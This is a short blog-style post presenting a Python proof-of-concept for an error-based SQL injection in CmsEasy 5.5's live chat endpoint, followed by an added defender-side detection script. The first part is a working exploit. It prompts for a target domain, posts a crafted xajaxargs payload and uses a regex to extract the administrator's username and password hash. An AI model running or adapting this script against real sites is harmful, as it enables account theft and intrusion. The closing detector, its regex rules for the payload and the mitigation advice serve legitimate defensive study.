Recently, to improve my programming skills, I have been writing small practical tools for practice. This script is written in Python and mainly uses the urllib and re modules.
Function: verify the CmsEasy 5.5 account and password
Experimental source code: http://pan.baidu.com/s/1i4lAwBF
Environment setup: phpStudy. I tried IIS+PHP but it did not reproduce there, so it is best to use phpStudy.
Accessing the page in a browser confirms that the vulnerability exists.
Implemented in Python:
import urllib.request
import urllib.parse
import re

domain = input('Please enter a domain name or IP (example:www.xx.com/xxx.xxx.xx):')
url = 'http://%s/cmseasy/celive/live/header.php' % (domain)
data = {
    'xajax': "LiveMessage",
    'xajaxargs[0][name]': "1',(SELECT 1 FROM"
                          " (SELECT COUNT(*),concat(rand(0),"
                          "(SELECT concat(username,0x23,password,md5(123))"
                          " FROM cmseasy_user WHERE groupid=2 LIMIT 1))a"
                          " FROM information_schema.tables GROUP BY a)b),"
                          "'','','','1','127.0.0.1','2') #"
}
data = urllib.parse.urlencode(data).encode('utf-8')  # encode the data to be POSTed
try:
    # A GET request needs no data argument; a POST request must pass it
    req = urllib.request.Request(url, data)
    response = urllib.request.urlopen(req)
    html = response.read().decode('utf-8')
    if re.findall(r'a801fc3202cb962ac59075b964b07152', html):
        print("%s is vulnerable" % (url))
        # Extract the account and password with a regular expression
        html2 = re.findall(r'(?<=entry \'1).*(?=a801fc3202cb962ac59075b964b07152)', html)
        print(html2)
except Exception as err:
    print('Not Found')
POC for a simple SQL injection
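A defender-side check for the request and response traits of the script above, as an added example that is not part of the original post. The rule set, function names and sample bodies are assumptions constructed for illustration, and the inner SELECT of the sample is neutralised.

```python
import re
from urllib.parse import parse_qsl, urlencode

TARGET_SUFFIX = "/celive/live/header.php"  # endpoint the script above posts to

# Assumed rule set: traits of the error-based payload shown above.
REQUEST_RULES = {
    "subquery_after_quote": re.compile(r"'\s*,\s*\(\s*select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "rand_group_by": re.compile(r"\brand\s*\(.*\bgroup\s+by\b", re.I | re.S),
    "trailing_comment": re.compile(r"(#|--\s)\s*$"),
}
# MySQL duplicate-key error text that should never reach an HTTP response.
RESPONSE_LEAK = re.compile(r"Duplicate entry '.{0,200}' for key", re.S)


def inspect_request(path, body):
    """Return sorted names of rules matched by any xajaxargs field in a POST body."""
    if not path.split("?", 1)[0].lower().endswith(TARGET_SUFFIX):
        return []
    hits = set()
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.lower().startswith("xajaxargs"):
            hits.update(name for name, rx in REQUEST_RULES.items() if rx.search(value))
    return sorted(hits)


def response_leaks_sql_error(html):
    """True when a response body contains the MySQL duplicate-entry error."""
    return bool(RESPONSE_LEAK.search(html))


# Constructed samples (not captured traffic).
BENIGN_BODY = urlencode({"xajax": "LiveMessage",
                         "xajaxargs[0][name]": "Alice, order #1234"})
SUSPECT_BODY = urlencode({"xajax": "LiveMessage", "xajaxargs[0][name]":
    "1',(SELECT 1 FROM (SELECT COUNT(*),concat(rand(0),(SELECT 1))a "
    "FROM information_schema.tables GROUP BY a)b),'','','','1','127.0.0.1','2') #"})
LEAKY_HTML = "<b>Duplicate entry '0.15admin#HASH' for key 'group_key'</b>"

if __name__ == "__main__":
    for body in (BENIGN_BODY, SUSPECT_BODY):
        print(inspect_request("/cmseasy/celive/live/header.php", body))
    print(response_leaks_sql_error(LEAKY_HTML))
```

Matching on the response side matters as much as the request side: the script only works when the database error text is echoed back, so suppressing SQL errors in responses and binding the `name` field as a query parameter both break it.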